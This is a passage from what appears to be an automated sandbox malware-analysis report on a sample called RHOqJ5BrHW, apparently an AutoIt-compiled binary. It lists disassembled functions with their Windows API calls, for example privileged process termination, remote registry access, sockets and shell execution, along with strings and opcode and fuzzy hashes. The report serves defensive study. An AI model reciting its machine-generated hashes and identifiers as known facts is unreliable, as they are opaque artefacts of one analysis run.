                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                    • String ID:
                                    • API String ID: 1422014791-0
                                    • Opcode ID: 2014c450753e584c3ab3d751e2d82c55a8c3af064bf72092acd8a51d74216363
                                    • Instruction ID: 31020f3042f2fdbc373eddddb7f748561f14ba9f3c89e307d809d151b74758ac
                                    • Opcode Fuzzy Hash: 2014c450753e584c3ab3d751e2d82c55a8c3af064bf72092acd8a51d74216363
                                    • Instruction Fuzzy Hash: 2A01BBB6240308BFE710EBE5DD49F6B7BACEB88711F018411FA05DB1A1CA749802CB61
                                    Function 009DC43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: NULL Pointer assignment$Not an Object type
                                    • API String ID: 0-572801152
                                    • Opcode ID: 501c5b57256e5f45005c9d39cc45d948f0181a2f3c54b30c1671f4efeb7e5ca8
                                    • Instruction ID: 8397b9a8a2c9a8fce3a7256cb3eb8afc7a77a89aec7cc780ac4de76e06628974
                                    • Opcode Fuzzy Hash: 501c5b57256e5f45005c9d39cc45d948f0181a2f3c54b30c1671f4efeb7e5ca8
                                    • Instruction Fuzzy Hash: 3CE1C2B1A4021AABDF14DFA4D981FAE77B9EF48354F14842AF905AB380D770ED41CB90
                                    Function 009DBB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$_memset
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2862541840-625585964
                                    • Opcode ID: be68264dcddd11ac4ec88f34d7007417358d7a7b3e294a9ad5cb524dfda01628
                                    • Instruction ID: 4349d4da6c573064ff3c9d4f3426c056703b67a81484ba3b70dec8f396e41800
                                    • Opcode Fuzzy Hash: be68264dcddd11ac4ec88f34d7007417358d7a7b3e294a9ad5cb524dfda01628
                                    • Instruction Fuzzy Hash: 6A919E71A40219EBDF24CFA5C844FAEBBB9EF85710F11855AF505AB280DB749941CFA0
                                    Function 009886C2 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 155COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _memset
                                    • String ID: Q\E$[$\$\$]$^
                                    • API String ID: 2102423945-1026548749
                                    • Opcode ID: b4fdf8173f3e7e882291913a30cb07799d7953948b1c1e85ba25ff84b58fe837
                                    • Instruction ID: dfb69ac4dbfc15187a6f7d3282d0e3f38136c20a7c336f84526cab3f6da7852e
                                    • Opcode Fuzzy Hash: b4fdf8173f3e7e882291913a30cb07799d7953948b1c1e85ba25ff84b58fe837
                                    • Instruction Fuzzy Hash: BC515971E002099BDF24DFD8C8817AEF7BABF94314F38816AD918A7351E7709D858B90
                                    Function 009E9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009E9B19
                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 009E9B2D
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009E9B47
                                    • _wcscat.LIBCMT ref: 009E9BA2
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 009E9BB9
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009E9BE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcscat
                                    • String ID: SysListView32
                                    • API String ID: 307300125-78025650
                                    • Opcode ID: e367d7405782d13f25d1770700f5a10794f7aaf368987d280faa2fd877735aa5
                                    • Instruction ID: d50acce381fc209e95af265dedd4b76845e69290582d2dab57767ae7d991e29b
                                    • Opcode Fuzzy Hash: e367d7405782d13f25d1770700f5a10794f7aaf368987d280faa2fd877735aa5
                                    • Instruction Fuzzy Hash: 15419071900348EBDB22DFA4DC85BEE77B8EF48350F10482AF589A7291D7759D85CB60
                                    Function 009E172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009C6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009C6554
                                      • Part of subcall function 009C6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 009C6564
                                      • Part of subcall function 009C6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009C65F9
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009E179A
                                    • GetLastError.KERNEL32 ref: 009E17AD
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009E17D9
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 009E1855
                                    • GetLastError.KERNEL32(00000000), ref: 009E1860
                                    • CloseHandle.KERNEL32(00000000), ref: 009E1895
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: 68a4834f62b6c95b31c529f7c0850c1eab6cc540f18a5d5246ea54977a343530
                                    • Instruction ID: ecdf50793a531a20f9ba0b25cadc33fd148a388ac0d94921987edecea63c5583
                                    • Opcode Fuzzy Hash: 68a4834f62b6c95b31c529f7c0850c1eab6cc540f18a5d5246ea54977a343530
                                    • Instruction Fuzzy Hash: 0441AE72A00200AFDB06EF99C8A5F6DB7A5AF84710F04849DF9069F2C2DB75ED41CB51
                                    Function 009C5819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 009C58B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: 688d0a25df49087a08475e3f46bb0b3d94684984e185f096701b31e39cc4b7de
                                    • Instruction ID: cab46ae07622c2b727640e84aeda89b1d16d93b86569b3d8a700c264bd064c61
                                    • Opcode Fuzzy Hash: 688d0a25df49087a08475e3f46bb0b3d94684984e185f096701b31e39cc4b7de
                                    • Instruction Fuzzy Hash: 77110D36A0DB47BFFB015B549C82F6B639CAF55320F21043EF500F52C1E764BA8042A6
                                    Function 009CA729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                    Download Yara Rule
                                    APIs
                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 009CA806
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ArraySafeVartype
                                    • String ID:
                                    • API String ID: 1725837607-0
                                    • Opcode ID: d630f58e242f75d8d652a3019ada51a18481f5dfe193434e88ef9070d296b46a
                                    • Instruction ID: 8cb7b512a20c83b57548d262bcf59e7d6dea98854274f52ae7256b7bd0e0a496
                                    • Opcode Fuzzy Hash: d630f58e242f75d8d652a3019ada51a18481f5dfe193434e88ef9070d296b46a
                                    • Instruction Fuzzy Hash: ABC17A75E0020E9FDB00CF98D495BAEB7B5FF08319F20446DE606E7291D735AA42CB92
                                    Function 009C6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009C6B63
                                    • LoadStringW.USER32(00000000), ref: 009C6B6A
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009C6B80
                                    • LoadStringW.USER32(00000000), ref: 009C6B87
                                    • _wprintf.LIBCMT ref: 009C6BAD
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009C6BCB
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 009C6BA8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wprintf
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 3648134473-3128320259
                                    • Opcode ID: f09beb928f9a53edc3b60c7990faba606d8fe1f1ff095ff853f7505dfa0bd1c9
                                    • Instruction ID: 01fe5eea6a5d38b7dbe661ebc191e3a768598b8aa1fdd5faf3a8cd719bd91096
                                    • Opcode Fuzzy Hash: f09beb928f9a53edc3b60c7990faba606d8fe1f1ff095ff853f7505dfa0bd1c9
                                    • Instruction Fuzzy Hash: 340112F790021C7FEB11E7E49D89EE6766CD704304F0045A5B745D6041EA749E868B71
                                    Function 009E2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E2BF6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharConnectRegistryUpper
                                    • String ID:
                                    • API String ID: 2595220575-0
                                    • Opcode ID: 8b587da53b6e2d6b63c4b5e7b495422994da9fdbf6ce17bfff04feeb859ff01c
                                    • Instruction ID: a028529b5b0cd376f56c4b954e2e9e865edb54bd0f3fd69c873deb3773e23e9b
                                    • Opcode Fuzzy Hash: 8b587da53b6e2d6b63c4b5e7b495422994da9fdbf6ce17bfff04feeb859ff01c
                                    • Instruction Fuzzy Hash: 88917C71604241AFCB01EF55C891B6EB7E9FF88310F14885DF99A972A1DB34ED45CB42
                                    Function 009D95BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • select.WSOCK32 ref: 009D9691
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D969E
                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 009D96C8
                                    • 733F1EB0.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009D96E9
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D96F8
                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 009D97AA
                                    • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00A1DC00), ref: 009D9765
                                      • Part of subcall function 009BD2FF: _strlen.LIBCMT ref: 009BD309
                                    • _strlen.LIBCMT ref: 009D9800
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                    • String ID:
                                    • API String ID: 3480843537-0
                                    • Opcode ID: 4c7c3a62ffeb5c084ab20426e9e7343af2d97b06b1a038f9274ad887e711ff99
                                    • Instruction ID: 01164fae0ee1afd8abdf630a12cf06eade05cd14a78223aba733d1433a6c3057
                                    • Opcode Fuzzy Hash: 4c7c3a62ffeb5c084ab20426e9e7343af2d97b06b1a038f9274ad887e711ff99
                                    • Instruction Fuzzy Hash: AD819B72504240ABC714EFA4CC85F6BBBA9EFC5714F108A1EF5559B291EB30D905CBA2
                                    Function 009AA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __mtinitlocknum.LIBCMT ref: 009AA991
                                      • Part of subcall function 009A7D7C: __FF_MSGBANNER.LIBCMT ref: 009A7D91
                                      • Part of subcall function 009A7D7C: __NMSG_WRITE.LIBCMT ref: 009A7D98
                                      • Part of subcall function 009A7D7C: __malloc_crt.LIBCMT ref: 009A7DB8
                                    • __lock.LIBCMT ref: 009AA9A4
                                    • __lock.LIBCMT ref: 009AA9F0
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00A36DE0,00000018,009B5E7B,?,00000000,00000109), ref: 009AAA0C
                                    • RtlEnterCriticalSection.KERNEL32(8000000C,00A36DE0,00000018,009B5E7B,?,00000000,00000109), ref: 009AAA29
                                    • RtlLeaveCriticalSection.KERNEL32(8000000C), ref: 009AAA39
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1422805418-0
                                    • Opcode ID: ac12bf02c9cb443b36ed15568a66fc2cf23a1c8516390bb781ee613f9e1c5eb2
                                    • Instruction ID: d7ee2861e1e5154355baaf1c7515f396b10b5283edd35cbf7b96a71b19dc32f7
                                    • Opcode Fuzzy Hash: ac12bf02c9cb443b36ed15568a66fc2cf23a1c8516390bb781ee613f9e1c5eb2
                                    • Instruction Fuzzy Hash: 33416775A007069BEB10CFA8CA4579CB7F5AF83334F248318E525AB2D2D7749802CBD2
                                    Function 009E8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 009E8EE4
                                    • GetDC.USER32(00000000), ref: 009E8EEC
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009E8EF7
                                    • ReleaseDC.USER32(00000000,00000000), ref: 009E8F03
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 009E8F3F
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009E8F50
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009EBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 009E8F8A
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009E8FAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: 8c7285741158bad4abd38aaadd8cf32d4ab719fa5542e66db81a8f55180a75c8
                                    • Instruction ID: 514649884d9c020b17ca4c8c35eab011a5939eebea58e2c5c21904e7f8a5f0b0
                                    • Opcode Fuzzy Hash: 8c7285741158bad4abd38aaadd8cf32d4ab719fa5542e66db81a8f55180a75c8
                                    • Instruction Fuzzy Hash: C4315C72100254BFEB118F95CC89FAB3BAEEB49715F044065FE099A191CA759C42CBB0
                                    Function 009D16DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                      • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                    • _wcstok.LIBCMT ref: 009D184E
                                    • _wcscpy.LIBCMT ref: 009D18DD
                                    • _memset.LIBCMT ref: 009D1910
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                    • String ID: X
                                    • API String ID: 774024439-3081909835
                                    • Opcode ID: 49902d90d15b051a31b04c521b81185c477ec7d6c073c922d2c86475e7b69985
                                    • Instruction ID: b13eaa7cc2f58a7e1ec38334f2c466f56ab6964dd97be3b5ffd6afcc9c800629
                                    • Opcode Fuzzy Hash: 49902d90d15b051a31b04c521b81185c477ec7d6c073c922d2c86475e7b69985
                                    • Instruction Fuzzy Hash: 80C18075608341AFC714EF64C995B5AB7E4BF85350F00892EF89A973A2DB30ED05CB82
                                    Function 0099AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b99bb406217b1b8acdf07ab84696fe54608f8400ed798d35355067fd1a2f8e5a
                                    • Instruction ID: fb40b33c2f44e7bee82ca482c185e9a4407dbe1fd273423b65f0e8f5f29baa54
                                    • Opcode Fuzzy Hash: b99bb406217b1b8acdf07ab84696fe54608f8400ed798d35355067fd1a2f8e5a
                                    • Instruction Fuzzy Hash: 21716CB1900109EFDF14CF98CC89ABEBB78FF85314F248149F915AA251C734AA52CFA5
                                    Function 009E2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009E225A
                                    • _memset.LIBCMT ref: 009E2323
                                    • ShellExecuteExW.SHELL32(?), ref: 009E2368
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                      • Part of subcall function 0099C6F4: _wcscpy.LIBCMT ref: 0099C717
                                    • CloseHandle.KERNEL32(00000000), ref: 009E242F
                                    • FreeLibrary.KERNEL32(00000000), ref: 009E243E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                    • String ID: @
                                    • API String ID: 4082843840-2766056989
                                    • Opcode ID: 2f088404bbc35827bfca684a1eb9661d52a9504718b2dfbab63d8e56f55c3d34
                                    • Instruction ID: eb2c61d75905d697c4d717d560f5b826b038a32cfe5a6f355d07a8a97b9ca796
                                    • Opcode Fuzzy Hash: 2f088404bbc35827bfca684a1eb9661d52a9504718b2dfbab63d8e56f55c3d34
                                    • Instruction Fuzzy Hash: E3716F719006599FCF05EFA9C881AAEB7F9FF88310F108459E855AB391DB34AD41CF90
                                    Function 009C3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(00000000), ref: 009C3C02
                                    • GetKeyboardState.USER32(?), ref: 009C3C17
                                    • SetKeyboardState.USER32(?), ref: 009C3C78
